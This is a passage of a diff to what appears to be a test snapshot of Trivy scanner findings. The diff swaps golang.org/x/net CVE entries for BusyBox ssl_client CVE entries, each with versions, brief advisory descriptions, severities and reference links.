"https://lists.apache.org/thread.html/r90b60cf49348e515257b4950900c1bd3ab95a960cf2469d919c7264e@%3Cnotifications.apisix.apache.org%3E", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://lists.apache.org/thread.html/ra63e8dc5137d952afc55dbbfa63be83304ecf842d1eab1ff3ebb29e2@%3Cnotifications.apisix.apache.org%3E", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220121-0002/", + "value": "https://lists.debian.org/debian-lts-announce/2020/11/msg00050.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-44716", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKQ3RVSMVZNZNO4D65W2CZZ4DMYFZN2Q/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", - "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27664", - "installedVersion": "v0.0.0-20201021035429-f5854403a974", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2357", - "https://access.redhat.com/security/cve/CVE-2022-27664", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2113814", - "https://bugzilla.redhat.com/2124669", - "https://bugzilla.redhat.com/2132868", - "https://bugzilla.redhat.com/2132872", - "https://bugzilla.redhat.com/2161274", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", - "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", - "https://errata.almalinux.org/9/ALSA-2023-2357.html", - "https://errata.rockylinux.org/RLSA-2022:7129", - "https://github.com/advisories/GHSA-69cg-p879-7622", - "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", - "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", - "https://github.com/golang/go/issues/54658", - "https://go.dev/cl/428735", - "https://go.dev/issue/54658", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-27664.html", - "https://linux.oracle.com/errata/ELSA-2023-2802.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", - "https://pkg.go.dev/vuln/GO-2022-0969", - "https://security.gentoo.org/glsa/202209-26", - "https://security.netapp.com/advisory/ntap-20220923-0004/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-27664", - ], - }, - "category": "Vulnerability", - "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "handle server errors after sending GOAWAY", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27664", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UW27QVY7ERPTSGKS4KAWE5TU7EJWHKVQ/", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2357", + "value": "https://musl.libc.org/releases.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27664", + "value": "https://ubuntu.com/security/notices/USN-5990-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", + "value": "https://www.openwall.com/lists/oss-security/2020/11/20/4", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.31.1-r20", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-28831", + "installedVersion": "1.31.1-r16", + "packageName": "ssl_client", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-28831", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28831", + "https://git.busybox.net/busybox/commit/?id=f25d254dfd4243698c31a4f3153d4ac72aa9e9bd", + "https://lists.debian.org/debian-lts-announce/2021/04/msg00001.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UDQGJRECXFS5EZVDH2OI45FMO436AC4/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z7ZIFKPRR32ZYA3WAA2NXFA3QHHOU6FJ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZASBW7QRRLY5V2R44MQ4QQM4CZIDHM2U/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-28831", + "https://security.gentoo.org/glsa/202105-09", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://ubuntu.com/security/notices/USN-5179-2", + "https://www.cve.org/CVERecord?id=CVE-2021-28831", + ], + }, + "category": "Vulnerability", + "description": "decompress_gunzip.c in BusyBox through 1.32.1 mishandles the error bit on the huft_build result pointer, with a resultant invalid free or segmentation fault, via malformed gzip data.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "busybox: invalid free or segmentation fault via malformed gzip data", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://avd.aquasec.com/nvd/cve-2021-28831", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://access.redhat.com/security/cve/CVE-2021-28831", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2113814", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28831", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2124669", + "value": "https://git.busybox.net/busybox/commit/?id=f25d254dfd4243698c31a4f3153d4ac72aa9e9bd", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132868", + "value": "https://lists.debian.org/debian-lts-announce/2021/04/msg00001.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132872", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UDQGJRECXFS5EZVDH2OI45FMO436AC4/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z7ZIFKPRR32ZYA3WAA2NXFA3QHHOU6FJ/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZASBW7QRRLY5V2R44MQ4QQM4CZIDHM2U/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-28831", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "https://security.gentoo.org/glsa/202105-09", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://ubuntu.com/security/notices/USN-5179-2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-28831", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42378", + "installedVersion": "1.31.1-r16", + "packageName": "ssl_client", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-42378", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42378", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42378", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42378", + ], + }, + "category": "Vulnerability", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_i function", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_i()", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://avd.aquasec.com/nvd/cve-2021-42378", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "value": "https://access.redhat.com/security/cve/CVE-2021-42378", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42378", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42378", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42378", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42379", + "installedVersion": "1.31.1-r16", + "packageName": "ssl_client", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-42379", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42379", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42379", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42379", + ], + }, + "category": "Vulnerability", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the next_input_file function", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the next_input_file()", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "value": "https://avd.aquasec.com/nvd/cve-2021-42379", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-42379", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:7129", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42379", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/54658", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://go.dev/cl/428735", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42379", }, { "type": "URL", - "value": "https://go.dev/issue/54658", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42379", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42380", + "installedVersion": "1.31.1-r16", + "packageName": "ssl_client", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-42380", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42380", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42380", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42380", + ], + }, + "category": "Vulnerability", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the clrvar function", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the clrvar()", + "references": [ { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "value": "https://avd.aquasec.com/nvd/cve-2021-42380", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-42380", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42380", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0969", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-26", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42380", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42380", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.7.0", - "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20201021035429-f5854403a974", - "packageName": "golang.org/x/net", + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42381", + "installedVersion": "1.31.1-r16", + "packageName": "ssl_client", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41723", - "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - "https://go.dev/cl/468135", - "https://go.dev/cl/468295", - "https://go.dev/issue/57855", - "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", - "https://pkg.go.dev/vuln/GO-2023-1571", - "https://vuln.go.dev/ID/GO-2023-1571.json", - "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "https://access.redhat.com/security/cve/CVE-2021-42381", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42381", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42381", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42381", ], }, "category": "Vulnerability", - "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the hash_init function", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "avoid quadratic complexity in HPACK decoding", + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the hash_init()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41723", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41723", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - }, - { - "type": "URL", - "value": "https://go.dev/cl/468135", - }, - { - "type": "URL", - "value": "https://go.dev/cl/468295", + "value": "https://avd.aquasec.com/nvd/cve-2021-42381", }, { "type": "URL", - "value": "https://go.dev/issue/57855", + "value": "https://access.redhat.com/security/cve/CVE-2021-42381", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42381", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42381", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1571", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42381", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20210428140749-89ef3d95e781", - "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-31525", - "installedVersion": "v0.0.0-20201021035429-f5854403a974", - "packageName": "golang.org/x/net", + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42382", + "installedVersion": "1.31.1-r16", + "packageName": "ssl_client", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-31525", - "https://github.com/advisories/GHSA-h86h-8ppg-mxmh", - "https://github.com/golang/go/issues/45710", - "https://go.dev/cl/313069", - "https://go.dev/issue/45710", - "https://go.googlesource.com/net/+/89ef3d95e781148a0951956029c92a211477f7f9", - "https://groups.google.com/g/golang-announce/c/cu9SP4eSXMc", - "https://linux.oracle.com/cve/CVE-2021-31525.html", - "https://linux.oracle.com/errata/ELSA-2021-3076.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ISRZZ6NY5R2TBYE72KZFOCO25TEUQTBF/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-31525", - "https://pkg.go.dev/vuln/GO-2022-0236", - "https://security.gentoo.org/glsa/202208-02", - "https://www.cve.org/CVERecord?id=CVE-2021-31525", + "https://access.redhat.com/security/cve/CVE-2021-42382", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42382", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42382", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42382", ], }, "category": "Vulnerability", - "description": "net/http in Go before 1.15.12 and 1.16.x before 1.16.4 allows remote attackers to cause a denial of service (panic) via a large header to ReadRequest or ReadResponse. Server, Transport, and Client can each be affected in some configurations.", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_s function", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "golang: net/http: panic in ReadRequest and ReadResponse when reading a very large header", + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_s()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-31525", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-31525", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-h86h-8ppg-mxmh", - }, - { - "type": "URL", - "value": "https://github.com/golang/go/issues/45710", - }, - { - "type": "URL", - "value": "https://go.dev/cl/313069", + "value": "https://avd.aquasec.com/nvd/cve-2021-42382", }, { "type": "URL", - "value": "https://go.dev/issue/45710", + "value": "https://access.redhat.com/security/cve/CVE-2021-42382", }, { "type": "URL", - "value": "https://go.googlesource.com/net/+/89ef3d95e781148a0951956029c92a211477f7f9", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/cu9SP4eSXMc", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42382", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-31525.html", + "value": 